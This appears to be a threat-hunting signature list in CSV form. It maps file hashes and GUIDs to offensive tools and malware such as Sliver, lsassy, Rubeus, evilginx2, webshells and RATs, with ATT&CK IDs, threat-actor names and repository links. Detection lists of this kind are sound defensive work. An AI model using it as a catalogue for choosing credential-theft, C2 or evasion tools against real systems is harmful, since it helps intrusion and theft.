"*3a5252edbc3926fde111e30235830dd0cbcb8f89efab7c24864db2a5399a5c3c*",".{0,1000}3a5252edbc3926fde111e30235830dd0cbcb8f89efab7c24864db2a5399a5c3c.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","24890"
"*3a572dd23436b9711f46a95f68952fda333a12e108a0a5bbded06a0e3c29c382*",".{0,1000}3a572dd23436b9711f46a95f68952fda333a12e108a0a5bbded06a0e3c29c382.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24892"
"*3a596620516109f4f6d5bfe1b2d38f53f04b60f3fff457573dd506ee981aaea3*",".{0,1000}3a596620516109f4f6d5bfe1b2d38f53f04b60f3fff457573dd506ee981aaea3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24893"
"*3a5a1ef73fded6644e0c6b4967fb129ec3716b517b6ca8699d72e2e0fd3e49ec*",".{0,1000}3a5a1ef73fded6644e0c6b4967fb129ec3716b517b6ca8699d72e2e0fd3e49ec.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#filehash","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","24894"
"*3a5dbd02b77211a50f970d07e5f7cb993788770bb9ea8e9c2af3041aefbb25b5*",".{0,1000}3a5dbd02b77211a50f970d07e5f7cb993788770bb9ea8e9c2af3041aefbb25b5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24895"
"*3a6431169073d61748829c31a9da29123dd61da8*",".{0,1000}3a6431169073d61748829c31a9da29123dd61da8.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","24896"
"*3a6b11aead22bb17534fcf1c45fe49cb11b09e3a5340f716abcfa21fdb2e0809*",".{0,1000}3a6b11aead22bb17534fcf1c45fe49cb11b09e3a5340f716abcfa21fdb2e0809.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24898"
"*3a71764fed9b90c2b7a05ca5cac028dc9980d5d4da2b53570f490b43c829f0c0*",".{0,1000}3a71764fed9b90c2b7a05ca5cac028dc9980d5d4da2b53570f490b43c829f0c0.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","24899"
"*3a7f12e2da6e68b00f1a0aff9b515e7c623da2304f729ed756e01582ddfb62aa*",".{0,1000}3a7f12e2da6e68b00f1a0aff9b515e7c623da2304f729ed756e01582ddfb62aa.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","24902"
"*3a87a1096cb7cd4dfeb7d8725aec180b68c3aab9393f50ebf0431cc7189b6d20*",".{0,1000}3a87a1096cb7cd4dfeb7d8725aec180b68c3aab9393f50ebf0431cc7189b6d20.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24904"
"*3a87abf646b679217d7c67e45c5df4bac7b3ea9f5e33ccd7ad82b964d0bc73a7*",".{0,1000}3a87abf646b679217d7c67e45c5df4bac7b3ea9f5e33ccd7ad82b964d0bc73a7.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","24905"
"*3a8e6fe87d5cea3b118aa6b900c63cf7c9d0e4fe3c3bced830861f2835caea33*",".{0,1000}3a8e6fe87d5cea3b118aa6b900c63cf7c9d0e4fe3c3bced830861f2835caea33.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24906"
"*3a8f9dbdb5a70ab427c99799ea3782cb768576d1affd329293f994f665bc2dc8*",".{0,1000}3a8f9dbdb5a70ab427c99799ea3782cb768576d1affd329293f994f665bc2dc8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24907"
"*3a9144c6468bfab90def18913d6119462ae1e972f4dc0c1ce0f9492afe3861c0*",".{0,1000}3a9144c6468bfab90def18913d6119462ae1e972f4dc0c1ce0f9492afe3861c0.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","24908"
"*3a9e7e5269489c8fbbd4c0f4786a8b8cef7a1e79a7a02b7f14850c696d0f3baf*",".{0,1000}3a9e7e5269489c8fbbd4c0f4786a8b8cef7a1e79a7a02b7f14850c696d0f3baf.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","cve-2019-0708","10","10","N/A","N/A","N/A","N/A","24909"
"*3a9ed2f23a034826d0ed1ef03f582b92e74cd4122abb9ae8f8243480d1c4411c*",".{0,1000}3a9ed2f23a034826d0ed1ef03f582b92e74cd4122abb9ae8f8243480d1c4411c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24910"
"*3aa113440e9f684df0d0f889c69ae914a40b07c10a340d1fad4f8365286fe19d*",".{0,1000}3aa113440e9f684df0d0f889c69ae914a40b07c10a340d1fad4f8365286fe19d.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#filehash","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","24911"
"*3aa2845ca86220e20ba6e4f2f08ff1aad9aa4c2cb47c38213bbf21e7fdd87b03*",".{0,1000}3aa2845ca86220e20ba6e4f2f08ff1aad9aa4c2cb47c38213bbf21e7fdd87b03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24912"
"*3aaa5fde51d080a80e911b350db316669db2ca264b1b6f55cdac91d1ad5267bf*",".{0,1000}3aaa5fde51d080a80e911b350db316669db2ca264b1b6f55cdac91d1ad5267bf.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","24913"
"*3aad76afcc5d9d5629cb512ca3f8c500fa381231bf15d51b797e30768d5e0e78*",".{0,1000}3aad76afcc5d9d5629cb512ca3f8c500fa381231bf15d51b797e30768d5e0e78.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","24914"
"*3aafc3d5f312ebd5b34219e53e22592f82b039fffe70322982a03a498c604d3a*",".{0,1000}3aafc3d5f312ebd5b34219e53e22592f82b039fffe70322982a03a498c604d3a.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","24915"
"*3ab344b38cb1d65babee1a52210280c415e6839642bbf7e7b9c4cc53d5b72f04*",".{0,1000}3ab344b38cb1d65babee1a52210280c415e6839642bbf7e7b9c4cc53d5b72f04.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","24916"
"*3ac48e132a8186b8302e04c77c22c4ff2984e6b6bd16bf65361cd1b751559703*",".{0,1000}3ac48e132a8186b8302e04c77c22c4ff2984e6b6bd16bf65361cd1b751559703.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24918"
"*3ac89800bd6dc53207c19d3d35161342cc19bc09a212710393ec9ab79fb55ba1*",".{0,1000}3ac89800bd6dc53207c19d3d35161342cc19bc09a212710393ec9ab79fb55ba1.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","24919"
"*3ad40dadb3c6030e56a037a58baf9111cc7d6a3a2bd02785f3d2fb1a0e38681d*",".{0,1000}3ad40dadb3c6030e56a037a58baf9111cc7d6a3a2bd02785f3d2fb1a0e38681d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24921"
"*3ad929cff8321e12459ff5053015cbcae9e4262652210e270077b7a8587e2567*",".{0,1000}3ad929cff8321e12459ff5053015cbcae9e4262652210e270077b7a8587e2567.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24922"
"*3ADB8BB1-AE14-49DA-A7E1-1C0D9BEB76E9*",".{0,1000}3ADB8BB1\-AE14\-49DA\-A7E1\-1C0D9BEB76E9.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24923"
"*3addcddea9689e047b939a8c8337d200212550f5c3f2b60fd66aceb7c0ee98cb*",".{0,1000}3addcddea9689e047b939a8c8337d200212550f5c3f2b60fd66aceb7c0ee98cb.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24924"
"*3adf9833e9f51c6a887107d4d4b402138fbeb11c633440f9085f0a93fe1d0afa*",".{0,1000}3adf9833e9f51c6a887107d4d4b402138fbeb11c633440f9085f0a93fe1d0afa.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","24926"
"*3ae0b0ec554f725076ca89389d9a3523e503a24248ee8a9b342f68c156e77b12*",".{0,1000}3ae0b0ec554f725076ca89389d9a3523e503a24248ee8a9b342f68c156e77b12.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","#filehash","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","24927"
"*3ae2ec1c3a9cb120b6c296aed13dfc8973449c74e8a93ed0de0f3b85ef8990d3*",".{0,1000}3ae2ec1c3a9cb120b6c296aed13dfc8973449c74e8a93ed0de0f3b85ef8990d3.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","24928"
"*3aefe6d2e264cb53be7ea8609f4d80d6264d98d051b446821e6efff94ce2baa6*",".{0,1000}3aefe6d2e264cb53be7ea8609f4d80d6264d98d051b446821e6efff94ce2baa6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24929"
"*3af0857c9fae7e41683d34af7e04c6ed29439466761512ebbf28bad7561d092b*",".{0,1000}3af0857c9fae7e41683d34af7e04c6ed29439466761512ebbf28bad7561d092b.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","24930"
"*3aff2f105c353378acd29dc43635769952d715d50e8cc87df39acf938c06d7c6*",".{0,1000}3aff2f105c353378acd29dc43635769952d715d50e8cc87df39acf938c06d7c6.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","24931"
"*3b02572ebc1fa9eb22898bc2f17f72d50775a18d4c6ff3094ea19e5b5f25c949*",".{0,1000}3b02572ebc1fa9eb22898bc2f17f72d50775a18d4c6ff3094ea19e5b5f25c949.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24932"
"*3b0506a5e557ba240500e7fa9017722ba54282eb8f917ea94a403854e4effc66*",".{0,1000}3b0506a5e557ba240500e7fa9017722ba54282eb8f917ea94a403854e4effc66.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","24935"
"*3b0c09c1852353c15372d27a6c0971472ef165c093024073990446219a887034*",".{0,1000}3b0c09c1852353c15372d27a6c0971472ef165c093024073990446219a887034.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#filehash","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","24936"
"*3b16492476a023f26e1c2539fbe209b60f80194e700983d2b3015827cf299e5d*",".{0,1000}3b16492476a023f26e1c2539fbe209b60f80194e700983d2b3015827cf299e5d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24938"
"*3b1e2b01bfa6ad0deefa3bf8e7a81e9fc295e56b8f087ef402d9a06e42ec3b95*",".{0,1000}3b1e2b01bfa6ad0deefa3bf8e7a81e9fc295e56b8f087ef402d9a06e42ec3b95.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","0","#filehash","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","24939"
"*3b2aea9615c1f94c724af17885c4587e9818652ff92e4debd002522e7be96a58*",".{0,1000}3b2aea9615c1f94c724af17885c4587e9818652ff92e4debd002522e7be96a58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24941"
"*3b3b3491978395ddceeab0ee18aa25ae8fcb1a8df43ef80ab4423517e9c5f566*",".{0,1000}3b3b3491978395ddceeab0ee18aa25ae8fcb1a8df43ef80ab4423517e9c5f566.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","24944"
"*3b3fd00d44c44dbb8387dcd1b41772fb3fdd14b15d24d2af981d9da783545b68*",".{0,1000}3b3fd00d44c44dbb8387dcd1b41772fb3fdd14b15d24d2af981d9da783545b68.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","24945"
"*3b40063cfd6244dbed0690aefe5a81f7b089677239237bfe8536eaa548c8b997*",".{0,1000}3b40063cfd6244dbed0690aefe5a81f7b089677239237bfe8536eaa548c8b997.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24946"
"*3b45f3db658c4628a97d2d8efa567415cb2e4cfc8a397570f0d33cc97c1aa78c*",".{0,1000}3b45f3db658c4628a97d2d8efa567415cb2e4cfc8a397570f0d33cc97c1aa78c.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","24947"
"*3B47EEBC-0D33-4E0B-BAB5-782D2D3680AF*",".{0,1000}3B47EEBC\-0D33\-4E0B\-BAB5\-782D2D3680AF.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#GUIDproject","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","24948"
"*3b486b14426ff6bb3e2c4e9d5d92821a50d5ef26f32e9ba244ca73fdfd81ec66*",".{0,1000}3b486b14426ff6bb3e2c4e9d5d92821a50d5ef26f32e9ba244ca73fdfd81ec66.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24949"
"*3b5038e3fcb6d73f7916f9f70bf8725e11caaed2e0b5cc367a85b7ddb66c62ca*",".{0,1000}3b5038e3fcb6d73f7916f9f70bf8725e11caaed2e0b5cc367a85b7ddb66c62ca.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24950"
